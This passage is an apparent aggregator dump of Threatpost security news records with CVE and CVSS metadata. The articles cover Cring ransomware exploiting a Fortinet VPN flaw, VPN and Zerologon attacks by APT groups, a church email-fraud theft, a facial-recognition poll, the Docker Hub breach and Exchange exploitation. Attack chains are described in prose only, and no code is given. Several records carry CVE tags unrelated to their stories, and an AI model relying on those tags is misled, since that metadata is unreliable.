[Conti](<https://threatpost.com/conti-40m-ransom-florida-school/165258/>). Cring was first [observed and reported](<https://id-ransomware.blogspot.com/2021/01/cring-ransomware.html>) by the researcher who goes by Amigo_A and Swisscom\u2019s CSIRT team in January. The ransomware is unique in that it uses two forms of encryption and destroys backup files in an effort to antagonize victims and prevent them from retrieving backup files without paying the ransom.\n\nLast week, the FBI and the Cybersecurity and Infrastructure Security Agency (CISA) [warned](<https://threatpost.com/fbi-apts-actively-exploiting-fortinet-vpn-security-holes/165213/>) that nation-state advanced persistent threat (APT) groups were actively exploiting known security vulnerabilities in the Fortinet FortiOS operating system, affecting the company\u2019s SSL VPN products.\n\nOne of those bugs, is CVE-2018-13379, a path-traversal flaw in Fortinet FortiOS. The vulnerability is tied to system\u2019s SSL VPN web portal and allows an unauthenticated attacker to download system files of targeted systems via a specially crafted HTTP resource requests.\n\nIn its report Kaspersky echoed the feds\u2019 warning adding attackers are first scanning connections to Fortinet VPNs to see if the software used on the device is the vulnerable version. In the campaign researchers observed, threat actors follow an exploit chain, exploiting CVE-2018-13379 to launch a directory-traversal attack. The goal is to crack open affected hardware, give adversaries access to network credentials and to establish foothold in the targeted network, Kopeytsev explained.\n\n\u201cA directory-traversal attack allows an attacker to access system files on the Fortigate SSL VPN appliance,\u201d he wrote. \u201cSpecifically, an unauthenticated attacker can connect to the appliance through the internet and remotely access the file \u2018sslvpn_websession,\u2019 which contains the username and password stored in cleartext.\u201d\n\nFor it\u2019s part, \u201cthe security of our customers is our first priority,\u201d according to a statement from Fortinet provided to Threatpost. \u201cFor example, CVE-2018-13379 is an old vulnerability resolved in May 2019. Fortinet immediately issued a _[PSIRT advisory](<https://fortiguard.com/psirt/FG-IR-18-384> \"https://fortiguard.com/psirt/fg-ir-18-384\" )_ and communicated directly with customers and via corporate blog posts on multiple occasions in _[August 2019](<https://www.fortinet.com/blog/business-and-technology/fortios-ssl-vulnerability> \"https://www.fortinet.com/blog/business-and-technology/fortios-ssl-vulnerability\" )_ and _[July 2020 ](<https://www.fortinet.com/blog/business-and-technology/atp-29-targets-ssl-vpn-flaws> \"https://www.fortinet.com/blog/business-and-technology/atp-29-targets-ssl-vpn-flaws\" )_strongly recommending an upgrade. Upon resolution we have consistently communicated with customers as recently as late as 2020. If customers have not done so, we urge them to immediately implement the upgrade and mitigations.\u201d\n\n## **Anatomy of an Attack**\n\nOnce gaining access to the first system on the enterprise network, attackers use the Mimikatz utility to steal the account credentials of Windows users who had previously logged in to the compromised system, according to Kaspersky.\n\nIn this way, attackers compromised the domain administrator account, and then used [commodity tools](<https://threatpost.com/ryuk-ransomware-gang-zerologon-lightning-attack/160286/>) like Cobalt Stroke backdoor and Powershell to propagate attacks across various systems on the network, according to the report.\n\nAfter gaining complete control, attackers download a cmd script to launch Cring ransomware, naming the malicious execution script \u201cKaspersky\u201d to disguise it as a security solution, Kopeytsev said.\n\nThe report breaks down how Cring achieves encryption and destroys existing backup files once it\u2019s launched on a system. First, the ransomware stops various services of two key programs on the network\u2014Veritas NetBackup and Microsoft SQL server.\n\nCring also halts the SstpSvc service, which is used to create VPN connections, which researchers surmised was to block any remediation effort by system administrators, Kopeytsev said.\n\n\u201cIt is most likely that the attackers, who at this stage controlled the infected system via Cobalt Strike, did this to make it impossible to connect to the infected system remotely via VPN,\u201d he wrote. \u201cThis was done to prevent system administrators from providing a timely response to the information security incident.\u201d\n\nCring proceeds by terminating other application processes in Microsoft Office and Oracle Database software to facilitate encryption as well as the removal of key backup files to prevent recovery of files, according to the report.\n\nIn its final step, Cring starts to encrypt files using strong encryption algorithms so victims can\u2019t decrypt files without knowing the RSA private key held by the attackers, Kopeytsev explained. First each file is encrypted using an AES encryption key and then that key is in turn encrypted using a 8,192-bit RSA public key hard-coded into the malicious program\u2019s executable file, he wrote.\n\nOnce encryption is complete, the malware drops a ransom note from attackers asking for two bitcoins (currently the equivalent of about $114,000) in exchange for the encryption key.\n\n## **Learning from Mistakes**\n\nThe report points out key mistakes made by network administrators in the attack observed by Kaspersky researchers in the hopes that other organizations can learn from them. First the attack highlights once again the importance of keeping systems updated with the latest patches, which could have avoided the incident altogether, Kopeytsev said.\n\n\u201cThe primary causes of the incident include the use of an outdated and vulnerable firmware version on the Fortigate VPN server (version 6.0.2 was used at the time of the attack), which enabled the attackers to exploit the CVE-2018-13379 vulnerability and gain access to the enterprise network,\u201d he wrote.\n\nSystem administrators also left themselves open to attack by not only running an antivirus (AV) system that was outdated, but also by disabling some components of AV that further reduced the level of protection, according to the report.\n\nKey errors in configuring privileges for domain policies and the parameteres of RDP access also came into play in the attack, basically giving attackers free rein once they entered the network, Kopeytsev observed.\n\n\u201cThere were no restrictions on access to different systems,\u201d he wrote. \u201cIn other words, all users were allowed to access all systems. Such settings help attackers to distribute malware on the enterprise network much more quickly, since successfully compromising just one user account provides them with access to numerous systems.\u201d\n\n**_Ever wonder what goes on in underground cybercrime forums? Find out on April 21 at 2 p.m. ET during a _****_[FREE Threatpost event](<https://threatpost.com/webinars/underground-markets-a-tour-of-the-dark-economy/?utm_source=ART&utm_medium=ART&utm_campaign=April_webinar>)_****_, \u201cUnderground Markets: A Tour of the Dark Economy.\u201d Experts will take you on a guided tour of the Dark Web, including what\u2019s for sale, how much it costs, how hackers work together and the latest tools available for hackers. _****_[Register here](<https://threatpost.com/webinars/underground-markets-a-tour-of-the-dark-economy/?utm_source=ART&utm_medium=ART&utm_campaign=April_webinar>)_****_ for the Wed., April 21 LIVE event. _**\n", "cvss3": {}, "published": "2021-04-08T14:00:32", "type": "threatpost", "title": "Hackers Exploit Fortinet Flaw in Sophisticated Cring Ransomware Attacks", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2018-13379"], "modified": "2021-04-08T14:00:32", "id": "THREATPOST:35A43D6CB9FAF8966F5C0D20045D1166", "href": "https://threatpost.com/hackers-exploit-flaw-cring-ransomware/165300/", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2020-04-10T12:11:12", "description": "State-sponsored advanced persistent threat (APT) groups are using flaws in outdated VPN technologies from Palo Alto Networks, Fortinet and Pulse Secure to carry out cyber attacks on targets in the United States and overseas, warned U.S. and U.K. officials.\n\nThe National Security Agency (NSA) issued a [Cybersecurity Advisory](<https://media.defense.gov/2019/Oct/07/2002191601/-1/-1/0/CSA-MITIGATING-RECENT-VPN-VULNERABILITIES.PDF>) Monday about the threats and offered mitigation suggestions, warning that multiple APT actors have weaponized three critical vulnerabilities first published in August\u2013[CVE-2019-11539](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11539>), [CVE-2019-11510](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11510>) and [CVE-2018-13379](<https://nvd.nist.gov/vuln/detail/CVE-2018-13379>)\u2013to gain access to vulnerable VPN devices. The first two affect Pulse Secure VPNs while the third affects Fortinet technology.\n\nThe National Cyber Security Centre in the United Kingdom posted [a separate warning](<https://www.ncsc.gov.uk/news/alert-vpn-vulnerabilities>) about the threats, which stem from vulnerabilities that allow \u201can attacker to retrieve arbitrary files, including those containing authentication credentials,\u201d according to the post.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nThe flaws allow an attacker to use those stolen credentials to connect to the VPN and change configuration settings or even connect to other infrastructure on the network, authorities warned. Through this unauthorized connection, an attacker could gain privileges to run secondary exploits that could allow them to access a root shell.\n\nThe U.K.\u2019s alert added two more Fortinet vulnerabilities to the list\u2013[CVE-2018-13382](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-13382>) and [CVE-2018-13383](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-13383>)\u2014as well as a Palo Alto Networks VPN flaw, [CVE-2019-1579](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1579>).\n\nAuthorities offered a series of mitigation techniques for the vulnerabilities, which they said should be taken very seriously by users of these products.\n\nTo mitigate attacks against all of the existing threats, officials recommend a couple of basic steps: apply any existing patches for VPNs in use that could be at risk, and update existing credentials. The NSA also recommended revoking existing VPN server keys and certificates and generating new ones.\n\nA more comprehensive list of mitigation techniques recommended by the NSA also includes discouraging the use of proprietary SSLVPN/TLSVPN protocols and self-signed and wild card certificates for public-facing VPN web applications; requiring mutual certificate-based authentication so remote clients attempting to access the public-facing VPN web application must present valid client certificates to maintain a connection; and using multi-factor authentication to prevent attackers from authenticating with compromised passwords by requiring a second authentication factor.\n\nNeither the NSA nor the National Cyber Security Centre alerts identified which groups are responsible for the attacks.\n\nThe warnings come after [reports surfaced](<https://www.zdnet.com/article/a-chinese-apt-is-now-going-after-pulse-secure-and-fortinet-vpn-servers/>) last month that APT5 was targeting VPNs from Fortinet and Pulse Secure after code for two of the aforementioned vulnerabilities was disclosed in a presentation at the Black Hat Security Conference (The two companies have patched those flaws, and in the case of Pulse Secure, issued the fixes in April, three months before Black Hat.).\n\nAPT5, a Chinese state-sponsored group also known as Manganese, has been active since 2007 with a particular focus on technology and telecommunications companies, according to a [report](<https://www.fireeye.com/content/dam/fireeye-www/current-threats/pdfs/rpt-southeast-asia-threat-landscape.pdf>) by FireEye.\n\n**_What are the top cyber security issues associated with privileged account access and credential governance? Experts from Thycotic will discuss during our upcoming free _**[**_Threatpost webinar_**](<https://register.gotowebinar.com/register/9029717654543174147?source=ART>)**_, \u201cHackers and Security Pros: Where They Agree &amp; Disagree When It Comes to Your Privileged Access Security.\u201d _**[**_Click here to register_**](<https://register.gotowebinar.com/register/9029717654543174147?source=ART>)**_._**\n", "cvss3": {}, "published": "2019-10-08T12:44:16", "type": "threatpost", "title": "APT Groups Exploiting Flaws in Unpatched VPNs, Officials Warn", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2018-13379", "CVE-2018-13382", "CVE-2018-13383", "CVE-2019-11510", "CVE-2019-11539", "CVE-2019-1579"], "modified": "2019-10-08T12:44:16", "id": "THREATPOST:2018FCCB3FFD46BACD36ADBC6C9013CE", "href": "https://threatpost.com/apt-groups-exploiting-flaws-in-unpatched-vpns-officials-warn/148956/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-10-13T16:45:38", "description": "U.S. government officials have warned that advanced persistent threat actors (APTs) are now leveraging Microsoft\u2019s severe privilege-escalation flaw, dubbed \u201cZerologon,\u201d to target elections support systems.\n\nDays after [Microsoft sounded the alarm that an Iranian nation-state actor](<https://threatpost.com/microsoft-zerologon-attack-iranian-actors/159874/>) was actively exploiting the flaw ([CVE-2020-1472](<https://www.tenable.com/cve/CVE-2020-1472>)), the Cybersecurity Infrastructure Security Agency (CISA) and the Federal Bureau of Investigation (FBI) published a joint advisory warning of further attacks.\n\nThe advisory details how attackers are chaining together various vulnerabilities and exploits \u2013 including using VPN vulnerabilities to gain initial access and then Zerologon as a post-exploitation method \u2013 to compromise government networks.\n\n[](<https://threatpost.com/webinars/retail-security-magecart-and-the-rise-of-retail-security-threats/?utm_source=ART&utm_medium=ART&utm_campaign=oct_webinar>)\n\nClick to Register!\n\n\u201cThis recent malicious activity has often, but not exclusively, been directed at federal and state, local, tribal and territorial (SLTT) government networks,\u201d according [to the security advisory](<https://us-cert.cisa.gov/ncas/alerts/aa20-283a>). \u201cAlthough it does not appear these targets are being selected because of their proximity to elections information, there may be some risk to elections information housed on government networks.\u201d\n\nWith the [U.S. November presidential elections](<https://threatpost.com/2020-election-secure-vote-tallies-problem/158533/>) around the corner \u2013 and cybercriminal activity subsequently ramping up to target [election infrastructure](<https://threatpost.com/black-hat-usa-2020-preview-election-security-covid-disinformation-and-more/157875/>) and [presidential campaigns](<https://threatpost.com/microsoft-cyberattacks-trump-biden-election-campaigns/159143/>) \u2013 election security is top of mind. While the CISA and FBI\u2019s advisory did not detail what type of elections systems were targeted, it did note that there is no evidence to support that the \u201cintegrity of elections data has been compromised.\u201d\n\nMicrosoft released a patch for the Zerologon vulnerability as part of its [August 11, 2020 Patch Tuesday security updates](<https://threatpost.com/microsoft-out-of-band-security-update-windows-remote-access-flaws/158511/>). Exploiting the bug allows an unauthenticated attacker, with network access to a domain controller, to completely compromise all Active Directory identity services, according to Microsoft.\n\nDespite a patch being issued, many companies have not yet applied the patches to their systems \u2013 and cybercriminals are taking advantage of that in a recent slew of government-targeted attacks.\n\nThe CISA and FBI warned that various APT actors are commonly using [a Fortinet vulnerability](<https://threatpost.com/apt-groups-exploiting-flaws-in-unpatched-vpns-officials-warn/148956/>) to gain initial access to companies. That flaw (CVE-2018-13379) is a path-traversal glitch in Fortinet\u2019s FortiOS Secure Socket Layer (SSL) virtual private network (VPN) solution. While the flaw was patched in April 2019, exploitation details were publicized in August 2019, opening the door for attackers to exploit the error.\n\nOther initial vulnerabilities being targeted in the attacks include ones in Citrix NetScaler ([CVE-2019-19781](<https://nvd.nist.gov/vuln/detail/CVE-2019-19781>)), MobileIron ([CVE-2020-15505](<https://nvd.nist.gov/vuln/detail/CVE-2020-15505>)), Pulse Secure ([CVE-2019-11510](<https://nvd.nist.gov/vuln/detail/CVE-2019-11510>)), Palo Alto Networks ([CVE-2020-2021](<https://nvd.nist.gov/vuln/detail/CVE-2020-2021>)) and F5 BIG-IP ([CVE-2020-5902](<https://nvd.nist.gov/vuln/detail/CVE-2020-5902>)).\n\nAfter exploiting an initial flaw, attackers are then leveraging the Zerologon flaw to escalate privileges, researchers said. They then use legitimate credentials to log in via VPN or remote-access services, in order to maintain persistence.\n\n\u201cThe actors are leveraging CVE-2020-1472 in Windows Netlogon to escalate privileges and obtain access to Windows AD servers,\u201d they said. \u201cActors are also leveraging the opensource tools such as Mimikatz and the CrackMapExec tool to obtain valid account credentials from AD servers.\u201d\n\nThe advisory comes as exploitation attempts against Zerologon spike, with Microsoft recently warned of exploits by an [advanced persistent threat](<https://threatpost.com/iranian-apt-targets-govs-with-new-malware/153162/>) (APT) actor, which the company calls MERCURY (also known as MuddyWater, Static Kitten and Seedworm). [Cisco Talos researchers also recently warned of](<https://threatpost.com/zerologon-attacks-microsoft-dcs-snowball/159656/>) a spike in exploitation attempts against Zerologon.\n\n[Earlier in September, the stakes got higher](<https://threatpost.com/windows-exploit-microsoft-zerologon-flaw/159254/>) for risks tied to the bug when four public proof-of-concept exploits for the flaw were released on** **[Github.](<https://github.com/dirkjanm/CVE-2020-1472>) This spurred the Secretary of Homeland Security [to issue a rare emergency directive](<https://threatpost.com/dire-patch-warning-zerologon/159404/>), ordering federal agencies to patch their Windows Servers against the flaw by Sept. 2.\n\nCISA and the FBI stressed that organizations should ensure their systems are patched, and adopt an \u201cassume breach\u201d mentality. Satnam Narang, staff research engineer with Tenable, agreed, saying that \u201cit seems clear that Zerologon is becoming one of the most critical vulnerabilities of 2020.\u201d\n\n\u201cPatches are available for all of the vulnerabilities referenced in the joint cybersecurity advisory from CISA and the FBI,\u201d said Narang [in a Monday analysis](<https://www.tenable.com/blog/cve-2020-1472-advanced-persistent-threat-actors-use-zerologon-vulnerability-in-exploit-chain>). \u201cMost of the vulnerabilities had patches available for them following their disclosure, with the exception of CVE-2019-19781, which received patches a month after it was originally disclosed.\u201d\n\n** [On October 14 at 2 PM ET](<https://threatpost.com/webinars/retail-security-magecart-and-the-rise-of-retail-security-threats/?utm_source=ART&utm_medium=ART&utm_campaign=oct_webinar>) Get the latest information on the rising threats to retail e-commerce security and how to stop them. [Register today](<https://threatpost.com/webinars/retail-security-magecart-and-the-rise-of-retail-security-threats/?utm_source=ART&utm_medium=ART&utm_campaign=oct_webinar>) for this FREE Threatpost webinar, \u201c[Retail Security: Magecart and the Rise of e-Commerce Threats.](<https://threatpost.com/webinars/retail-security-magecart-and-the-rise-of-retail-security-threats/?utm_source=ART&utm_medium=ART&utm_campaign=oct_webinar>)\u201d Magecart and other threat actors are riding the rising wave of online retail usage and racking up big numbers of consumer victims. Find out how websites can avoid becoming the next compromise as we go into the holiday season. Join us Wednesday, Oct. 14, 2-3 PM ET for this [LIVE ](<https://threatpost.com/webinars/retail-security-magecart-and-the-rise-of-retail-security-threats/?utm_source=ART&utm_medium=ART&utm_campaign=oct_webinar>)webinar.**\n", "cvss3": {}, "published": "2020-10-13T16:39:01", "type": "threatpost", "title": "Election Systems Under Attack via Microsoft Zerologon Exploits", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2018-13379", "CVE-2019-11510", "CVE-2019-19781", "CVE-2020-1472", "CVE-2020-15505", "CVE-2020-2021", "CVE-2020-5902"], "modified": "2020-10-13T16:39:01", "id": "THREATPOST:71C45E867DCD99278A38088B59938B48", "href": "https://threatpost.com/election-systems-attack-microsoft-zerologon/160021/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-04-08T11:57:09", "description": "A church in Brunswick, Ohio was scammed out of a whopping $1.75 million as a result of a business email compromise (BEC) attack.\n\nSt. Ambrose Catholic Parish, which has around 16,000 members, has been working on a massive $4 million church renovation, dubbed \u201cVision 20/20\u201d \u2013 but attackers figured out a way to hack into the church\u2019s email system, take control of two church employee accounts, and eventually divert payments related to the project to a fraudulent account owned by them.\n\nAccording to [local reports](<https://www.cleveland.com/crime/2019/04/email-hackers-steal-175-million-from-st-ambrose-catholic-parish-in-brunswick.html>), the church said in a letter to parishioners over the weekend that it was notified of the issue on April 17, after the construction company behind the renovations contacted the church saying it had missed payments on the project.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\n\u201cOn Wednesday, Marous Brothers called inquiring as to why we had not paid our monthly payment on the project for the past two months, totaling approximately $1,750,000,\u201d according to an email sent by the church to parishioners. \u201cThis was shocking news to us, as we have been very prompt on our payments every month and have received all the appropriate confirmations from the bank that the wire transfers of money to Marous were executed/confirmed.\u201d\n\nAfter involving the Brunswick police and the FBI, the church discovered that their email system was hacked and that bad actors had taken control of two employee email accounts.\n\nUsing these two hacked accounts, the attackers were able to pretend they were the email accounts\u2019 real owners, and deceived other employees into believing Marous Brothers had changed their bank and wiring instructions. The $1.75 million in church payments for two months were then sent to a fraudulent bank account owned by the cybercriminals.\n\n\u201cThe money was then swept out by the perpetrators before anyone knew what had happened,\u201d according to the church. \u201cNeedless to say, this was very distressing information.\u201d\n\nThe church said it is currently working with the FBI and its insurance company to try to recover the stolen funds. Meanwhile, it said, no other data \u2013 such as databases with parishioner information or church financial information \u2013 has been compromised.\n\nBEC scams continue to plague companies as attackers become more advanced \u2013 particularly as infamous BEC groups like [London Blue](<https://threatpost.com/bec-scam-gang-london-blue-evolves-tactics-targets/143440/>), [Scarlet Widow](<https://threatpost.com/rsac-2019-bec-scammer-gang-takes-aim-at-boy-scouts-other-nonprofts/142302/>) and others continue honing their techniques.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2019/04/30112714/FBI-IC3-11.png>)\n\n[According to](<https://threatpost.com/fbi-bec-scam-losses-double/144038/>) the FBI\u2019s annual Internet Crime Report (IC3) for 2018, BEC scams ultimately drained victims of over $1.2 billion last year. For contrast, in 2017, BEC attacks resulted in adjusted losses of $675 million.\n\nSt. Ambrose Catholic Parish isn\u2019t the first high-profile community case, either. The FBI in its report said it received a complaint from a town in New Jersey that fell victim of a BEC scam \u2014 and transferred over $1 million to a fraudulent account (the FBI was able to freeze the funds and return the money to the town). Individuals suffer too: In another case, a BEC victim received a email purporting to be from their closing agent during a real-estate transaction \u2014 resulting in the person initiating a wire transfer of $50,000 to a fraudster\u2019s bank account located in New York.\n\nRonnie Tokazowski, senior threat researcher at Agari, told Threatpost in a recent interview there are several steps that firms \u2013 and individuals \u2013 can take to protect against BEC scams.\n\n\u201cFor BEC protections, there are several things that organizations and individuals can do to not fall victim,\u201d he said. \u201cFirstly, implementing a DMARC [which stands for Domain-based Message Authentication, Reporting and Conformance and is an email authentication protocol] solution can help organizations look at the reputation of senders who may be spoofing their CEO\u2019s, asking for wire transfers or gift card. For individuals, being informed about the different types of scams that actors are using can be helpful as well.\u201d\n", "cvss3": {}, "published": "2019-04-30T16:21:59", "type": "threatpost", "title": "BEC Hack Cons Catholic Church Out of $1.75 Million", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-0688"], "modified": "2019-04-30T16:21:59", "id": "THREATPOST:2BDC072802830F0CC831DE4C4F1FA580", "href": "https://threatpost.com/bec-hack-cons-catholic-church/144212/", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2020-04-08T11:52:16", "description": "Half of respondents in a recent Threatpost poll said that they don\u2019t believe consent realistically exists when it comes to real-life facial recognition.\n\nThe [recent poll](<https://threatpost.com/poll-creeped-out-facial-recognition/144084/>) of 170 readers comes as facial recognition applications [continue to pop up](<https://threatpost.com/facial-recognition-are-we-ready/144066/>) in the real world \u2013 from airports to police forces. While biometrics certainly has advantages \u2013 such as making identification more efficient \u2013 gaining consent from people whose biometrics are being taken remains a mystery to some, with 53 percent of respondents saying they don\u2019t believe that consent exists or is possible in real-life facial recognition applications .\n\nIn the poll, 32 percent more respondents said that consent will be the act of giving people notification that an area is using facial recognition; and only 10 percent said consent is the ability to opt out of facial recognition applications.\n\nThe issue of biometrics consent came to the forefront again in December when the Department of Homeland Security unveiled a facial-recognition pilot program for monitoring public areas surrounding the [White House](<https://threatpost.com/white-house-facial-recognition-pilot-raises-privacy-alarms/139649/>). When asked about consent, the department said that the public cannot opt-out of the pilot, except by avoiding the areas that will be filmed as part of the program.\n\n\u201cA very weak form of protection is if the government or a business [that uses biometrics for] surveillance, they notify people,\u201d Adam Schwartz, senior staff attorney with the Electronic Frontier Foundation\u2019s civil liberties team, told Threatpost. \u201cWe think this is not consent \u2013 real consent is where they don\u2019t aim a camera at you.\u201d\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2019/04/25163405/consent.png>)\n\nBeyond consent, more than half of poll respondents said that they have negative feelings toward facial recognition due to issues related to privacy and security \u2013 while 30 percent more said they have \u201cmixed\u201d feelings, understanding both the benefits and privacy concerns.\n\nWhen asked what concerns them the most about real-world facial applications, 55 percent of those surveyed pointed to privacy and surveillance issues, while 29 percent said the security of biometrics information and how the data is shared.\n\nDespite these concerns, biometrics continues to gain traction, with the EU last week [approving](<https://www.securityresearch-cou.eu/sites/default/files/02.Rinkens.Secure%20safe%20societies_EU%20interoperability_4-3_v1.0.pdf>) a massive biometrics database for both EU and non-EU citizens. The EU\u2019s approval of the database, called the \u201cCommon Identity Repository,\u201d will aim to connect the systems used by border control, migration and law-enforcement agencies.\n\nAs biometrics continue to increase, meanwhile, up to 85 percent of respondents said that they think that facial recognition should be regulated in the future.\n\nSuch laws exist or are being discussed as it relates to consent: An [Illinois law](<http://www.ilga.gov/legislation/ilcs/ilcs3.asp?ActID=3004&ChapterID=57>) for instance regulates collection of biometric information (including for facial recognition) without consent.\n\nHowever, that law only applies to businesses and not law enforcement. Meanwhile, a new bill introduced in the Senate in [March](<https://www.schatz.senate.gov/imo/media/doc/SIL19337.pdf>), the \u201cCommercial Facial Recognition Privacy Act,\u201d would bar businesses that are using facial recognition from harvesting and sharing user data without consent.\n\n\u201cThe time to regulate and restrict the use of facial recognition technology is now, before it becomes embedded in our everyday lives,\u201d said Jason Kelly, digital strategist with EFF, in a [recent post](<https://www.eff.org/deeplinks/2019/04/skip-surveillance-opting-out-face-recognition-airports>). \u201cGovernment agencies and airlines have ignored years of warnings from privacy groups and Senators that using face recognition technology on travelers would massively violate their privacy. Now, the passengers are in revolt as well, and they\u2019re demanding answers.\u201d\n", "cvss3": {}, "published": "2019-04-26T12:10:15", "type": "threatpost", "title": "Facial Recognition 'Consent\u2019 Doesn\u2019t Exist, Threatpost Poll Finds", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-0688"], "modified": "2019-04-26T12:10:15", "id": "THREATPOST:677D5A0A56D06021C8EF30D0361579C6", "href": "https://threatpost.com/facial-recognition-consent-doesnt-exist-threatpost-poll-finds/144126/", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2020-04-08T11:52:03", "description": "UPDATE\n\nDocker Hub has confirmed that it was hacked last week; with sensitive data from approximately 190,000 accounts potentially exposed.\n\n\u201cOn Thursday, April 25th, 2019, we discovered unauthorized access to a single Hub database storing a subset of non-financial user data,\u201d Kent Lamb, director of Docker Support, said in an email over the weekend, which a Docker user [posted on online](<https://news.ycombinator.com/item?id=19763413>). \u201cUpon discovery, we acted quickly to intervene and secure the site.\u201d\n\nThe container specialist noted that it was a \u201cbrief period\u201d of unauthorized access that impacted less than 5 percent of Hub users; however, the data includes usernames and hashed passwords, as well as Github and Bitbucket tokens for Docker autobuilds.\n\n[](<https://threatpost.com/newsletter-sign/>) \nDocker has revoked GitHub tokens and access keys for affected accounts, and the company warned that this may affect ongoing builds from its automated build service; users \u201cmay need to [unlink and then relink](<https://docs.docker.com/docker-hub/builds/link-source/>) your GitHub and BitBucket source provider,\u201d Lamb warned.\n\nTorsten George, cybersecurity evangelist at Centrify, told Threatpost that \u201cWhen you dig deeper into the details of the breach, you\u2019ll see that it\u2019s not about the numbers, but the reach. The big issue about this breach is the fact that the database included tokens from other much-used developer resources, including GitHub and Bitbucket. This breach stresses the importance of application-to-application password management (AAPM) and temporary credentials rather than permanent ones.\u201d\n\n## Ramifications and What to Do\n\nCleanup from the incident could be significant endeavor, according to researchers.\n\n\u201cAs a result of this breach, it\u2019s possible that images in your Docker Hub repository may have been tampered with or overwritten,\u201d Wei Lien Dang, vice president of product at StackRox, told Threatpost. \u201cAttacks on the build pipeline can have serious downstream effects on what is currently running inside your infrastructure. Tainted images can be difficult to detect, and the containers launched from them may even run as expected, except with a malicious process in the background. If you use Docker Hub with Kubernetes environments, you\u2019ll also need to roll your ImagePullSecrets.\u201d\n\nEven though the passwords were hashed, Docker Hub users should change their passwords on Docker Hub and any other accounts that share that password. Users can also [view security actions](<https://help.github.com/en/articles/reviewing-your-security-log%20and%20https:/bitbucket.org/blog/new-audit-logs-give-you-the-who-what-when-and-where>) on GitHub and BitBucket accounts to check for unauthorized access.\n\n\u201cUnexpected changes in images will have an effect on application behavior, making runtime detection and application baselining critical,\u201d Dang said. \u201cCharacterizing the behaviors of individual Kubernetes deployments will highlight deviations in network connectivity, file access and process executions. These deviations are all indicators that malicious activity is taking place within a container. You need the ability to quickly inspect runtime activity within your containers to verify they are running only expected processes.\u201d\n\nAlso, because Docker didn\u2019t provide a specific timeline for this breach, no one knows how long ago the unauthorized access occurred. \u201cAs with most breaches, the perpetrators may have had access to compromised resources significantly longer than just last week,\u201d Dang said. \u201cTo be safe, you should verify recently pushed images going back over the past several weeks. Doing this audit can be difficult, as not every registry will let you filter the data by image age.\u201d\n\n## Docker: An Escalating Target?\n\nDocker has been in the security headlines before in the recent past; for instance, in January, researchers [hacked the Docker test platform](<https://threatpost.com/hack-allows-escape-of-play-with-docker-containers/140831/>) called Play-with-Docker with a proof-of-concept hack, allowing them to access data and manipulate any test Docker containers running on the host system. The team was able to escape the container and run code remotely right on the host.\n\nAlso, last year 17 malicious docker images [were found available](<https://threatpost.com/malicious-docker-containers-earn-crypto-miners-90000/132816/>) on Docker Hub that allowed hackers to earn $90,000 in cryptojacking profits.\n\nAnd Docker [in 2017 patched](<https://threatpost.com/docker-patches-container-escape-vulnerability/123161/>) a privilege escalation vulnerability that could also have lead to container escapes, allowing a hacker to affect operations of a host from inside a container.\n\nContainers are increasing in popularity among DevOps users in companies of all sizes because they facilitate collaboration, which optimizes their ability to deliver code fast to virtual environments. However, Lacework in [an analysis in 2018](<https://threatpost.com/22k-open-vulnerable-containers-found-exposed-on-the-net/132898/>) noted that securing workloads in public clouds requires a different approach than that used for traditional data centers, where APIs drive the infrastructure and create short-lived workloads. In turn, they\u2019re also becoming more interesting to cybercriminals, Dan Hubbard, chief security architect at Lacework, told Threatpost.\n\nEnterprises also report an accelerating number of container attacks. In fact, 60 percent of respondents in [a recent survey](<https://threatpost.com/threatlist-container-security/140614/>) acknowledged that their organizations had been hit with at least one container security incident within the past year. In companies with more than 100 containers in place, that percentage rises to 75 percent.\n\n_This story was updated on April 30 to add insight into potential repercussions of the incident. _\n", "cvss3": {}, "published": "2019-04-29T14:13:23", "type": "threatpost", "title": "Docker Hub Hack Affects 190K Accounts, with Concerning Consequences", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-0688"], "modified": "2019-04-29T14:13:23", "id": "THREATPOST:B047BB0FECBD43E30365375959B09B04", "href": "https://threatpost.com/docker-hub-hack/144176/", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2020-03-10T12:45:58", "description": "Multiple threat groups are actively exploiting a vulnerability in Microsoft Exchange servers, researchers warn. If left unpatched, the flaw allows authenticated attackers to execute code remotely with system privileges.\n\nThe vulnerability in question (CVE-2020-0688) exists in the control panel of Exchange, Microsoft\u2019s mail server and calendaring server, and was fixed as part of Microsoft\u2019s [February Patch Tuesday](<https://threatpost.com/microsoft-active-attacks-air-gap-99-patches/152807/>) updates. However, researchers [in a Friday advisory](<https://www.volexity.com/blog/2020/03/06/microsoft-exchange-control-panel-ecp-vulnerability-cve-2020-0688-exploited/>) said that unpatched servers are being exploited in the wild by unnamed advanced persistent threat (APT) actors.\n\n\u201cWhat we have seen thus far are multiple Chinese APT group exploiting or attempting to exploit this flaw,\u201d Steven Adair, founder and president of Volexity, told Threatpost. \u201cHowever, I think it is safe to say that this exploit is now in the hands of operators around the world and unfortunately some companies that have not patched yet or did not patch quickly enough are likely to pay the price.\u201d\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nAttacks first started late February and targeted \u201cnumerous affected organizations,\u201d researchers 